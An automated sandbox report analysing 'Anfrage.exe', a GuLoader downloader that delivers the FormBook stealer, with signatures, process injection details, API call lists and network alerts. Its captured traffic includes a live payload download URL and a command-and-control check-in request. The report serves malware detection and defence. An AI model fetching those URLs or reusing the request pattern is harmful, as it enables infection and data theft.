Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Anfrage.exe

Overview

General Information

Sample name:Anfrage.exe
Analysis ID:1553562
MD5:71ea800a6b7644be75507e3b74e3cce2
SHA1:aa1ac653b8d942a98770538d3e1fb325491cab45
SHA256:e81a266ca8fee88c3eee94cea7494225e905354c9e31635683467fbfe7844d91
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Anfrage.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\Anfrage.exe" MD5: 71EA800A6B7644BE75507E3B74E3CCE2)
    • Anfrage.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\Anfrage.exe" MD5: 71EA800A6B7644BE75507E3B74E3CCE2)
      • mrdYGoZBmXi.exe (PID: 5252 cmdline: "C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ktmutil.exe (PID: 3532 cmdline: "C:\Windows\SysWOW64\ktmutil.exe" MD5: AC387D5962B2FE2BF4D518DD57BA7230)
          • mrdYGoZBmXi.exe (PID: 2220 cmdline: "C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T12:03:35.896385+010020229301A Network Trojan was detected4.175.87.197443192.168.2.849705TCP
            2024-11-11T12:04:13.973164+010020229301A Network Trojan was detected20.12.23.50443192.168.2.849711TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T12:05:16.864867+010020507451Malware Command and Control Activity Detected192.168.2.8497163.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T12:04:37.711666+010028032702Potentially Bad Traffic192.168.2.849713188.40.95.144443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-11T12:05:16.864867+010028554651A Network Trojan was detected192.168.2.8497163.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Anfrage.exeAvira: detected
            Multi AV Scanner detection for submitted file
            Source: Anfrage.exeReversingLabs: Detection: 52%
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: Anfrage.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: Anfrage.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrdYGoZBmXi.exe, 00000008.00000000.2402775106.0000000000EDE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: wntdll.pdbUGP source: Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Anfrage.exe, Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405665
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004060C7 FindFirstFileA,FindClose,0_2_004060C7
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 4x nop then xor eax, eax9_2_028C9EA0

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49716 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49716 -> 3.33.130.190:80
            Source: Joe Sandbox ViewIP Address: 188.40.95.144 188.40.95.144
            Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
            Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49713 -> 188.40.95.144:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.8:49711
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.8:49705
            Source: global trafficHTTP traffic detected: GET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.7fh27o.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /JWXOdIrgRlshLWuPJxOk219.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: familytherapycenter.rsCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /wevl/?adSdg=uTwLyznpTHNh&LHxDf=lbf7j9XjlAZpd6A3UpNyt3NI6+34CVhmT1tEP0o3aWJOYRwplTIV2PpchU+8eNrfAMA1Qr8MjrKSknsxLVAK3zAHSnA/F7MUkgRRnoRlRVKgbnrUxpjP+0evIyvFm5JEhA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.7fh27o.vipConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; LGL39C Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: familytherapycenter.rs
            Source: global trafficDNS traffic detected: DNS query: www.7fh27o.vip
            Source: Anfrage.exe, Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Anfrage.exe, 00000000.00000000.1402818143.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000000.00000002.2121584129.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Anfrage.exe, 00000007.00000000.2118674317.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Anfrage.exe, 00000007.00000001.2121368668.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.bin
            Source: Anfrage.exe, 00000007.00000003.2389055505.0000000006298000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.000000000629A000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.0000000006298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binI
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binLeg
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006285000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://familytherapycenter.rs/JWXOdIrgRlshLWuPJxOk219.binM
            Source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
            Source: unknownHTTPS traffic detected: 188.40.95.144:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040511A

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000007.00000002.2511601246.00000000370E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646659218.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2647502871.0000000002EB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2476059980.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2647873308.00000000023D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2646605622.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Anfrage.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364035C0 NtCreateMutant,LdrInitializeThunk,7_2_364035C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_36402C70
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36403010 NtOpenDirectoryObject,7_2_36403010
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36403090 NtSetValueKey,7_2_36403090
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36403D70 NtOpenThread,7_2_36403D70
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36403D10 NtOpenProcessToken,7_2_36403D10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364039B0 NtGetContextThread,7_2_364039B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36404650 NtSuspendThread,7_2_36404650
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36404340 NtSetContextThread,7_2_36404340
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402E30 NtWriteVirtualMemory,7_2_36402E30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402EE0 NtQueueApcThread,7_2_36402EE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402E80 NtReadVirtualMemory,7_2_36402E80
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402EA0 NtAdjustPrivilegesToken,7_2_36402EA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402F60 NtCreateProcessEx,7_2_36402F60
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402F30 NtCreateSection,7_2_36402F30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402FE0 NtCreateFile,7_2_36402FE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402F90 NtProtectVirtualMemory,7_2_36402F90
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402FA0 NtQuerySection,7_2_36402FA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402FB0 NtResumeThread,7_2_36402FB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402C60 NtCreateKey,7_2_36402C60
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402C00 NtQueryInformationProcess,7_2_36402C00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402CC0 NtQueryVirtualMemory,7_2_36402CC0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402CF0 NtOpenProcess,7_2_36402CF0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402CA0 NtQueryInformationToken,7_2_36402CA0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402D00 NtSetInformationFile,7_2_36402D00
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402D10 NtMapViewOfSection,7_2_36402D10
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402D30 NtUnmapViewOfSection,7_2_36402D30
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402DD0 NtDelayExecution,7_2_36402DD0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402DF0 NtQuerySystemInformation,7_2_36402DF0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402DB0 NtEnumerateKey,7_2_36402DB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402AD0 NtReadFile,7_2_36402AD0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402AF0 NtWriteFile,7_2_36402AF0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402AB0 NtWaitForSingleObject,7_2_36402AB0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402B60 NtClose,7_2_36402B60
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402BE0 NtQueryValueKey,7_2_36402BE0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402BF0 NtAllocateVirtualMemory,7_2_36402BF0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402B80 NtQueryInformationFile,7_2_36402B80
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36402BA0 NtEnumerateValueKey,7_2_36402BA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03374340 NtSetContextThread,LdrInitializeThunk,9_2_03374340
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03374650 NtSuspendThread,LdrInitializeThunk,9_2_03374650
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372B60 NtClose,LdrInitializeThunk,9_2_03372B60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_03372BF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372BE0 NtQueryValueKey,LdrInitializeThunk,9_2_03372BE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372AD0 NtReadFile,LdrInitializeThunk,9_2_03372AD0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372F30 NtCreateSection,LdrInitializeThunk,9_2_03372F30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372FB0 NtResumeThread,LdrInitializeThunk,9_2_03372FB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372FE0 NtCreateFile,LdrInitializeThunk,9_2_03372FE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_03372E80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372EE0 NtQueueApcThread,LdrInitializeThunk,9_2_03372EE0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_03372D30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372D10 NtMapViewOfSection,LdrInitializeThunk,9_2_03372D10
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03372DF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372DD0 NtDelayExecution,LdrInitializeThunk,9_2_03372DD0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_03372C70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372C60 NtCreateKey,LdrInitializeThunk,9_2_03372C60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_03372CA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033735C0 NtCreateMutant,LdrInitializeThunk,9_2_033735C0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_033739B0 NtGetContextThread,LdrInitializeThunk,9_2_033739B0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372BA0 NtEnumerateValueKey,9_2_03372BA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372B80 NtQueryInformationFile,9_2_03372B80
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372AB0 NtWaitForSingleObject,9_2_03372AB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372AF0 NtWriteFile,9_2_03372AF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372F60 NtCreateProcessEx,9_2_03372F60
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372FA0 NtQuerySection,9_2_03372FA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372F90 NtProtectVirtualMemory,9_2_03372F90
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372E30 NtWriteVirtualMemory,9_2_03372E30
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372EA0 NtAdjustPrivilegesToken,9_2_03372EA0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372D00 NtSetInformationFile,9_2_03372D00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372DB0 NtEnumerateKey,9_2_03372DB0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372C00 NtQueryInformationProcess,9_2_03372C00
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372CF0 NtOpenProcess,9_2_03372CF0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03372CC0 NtQueryVirtualMemory,9_2_03372CC0
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03373010 NtOpenDirectoryObject,9_2_03373010
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03373090 NtSetValueKey,9_2_03373090
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03373D10 NtOpenProcessToken,9_2_03373D10
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_03373D70 NtOpenThread,9_2_03373D70
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E9210 NtCreateFile,9_2_028E9210
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E9380 NtReadFile,9_2_028E9380
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E9690 NtAllocateVirtualMemory,9_2_028E9690
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_028E9530 NtClose,9_2_028E9530
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031A3
            Source: C:\Users\user\Desktop\Anfrage.exeFile created: C:\Windows\resources\soenderbro.iniJump to behavior
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_004049590_2_00404959
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_0040655F0_2_0040655F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 0_2_00406D360_2_00406D36
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364156307_2_36415630
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364816CC7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648F7B07_2_3648F7B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C14607_2_363C1460
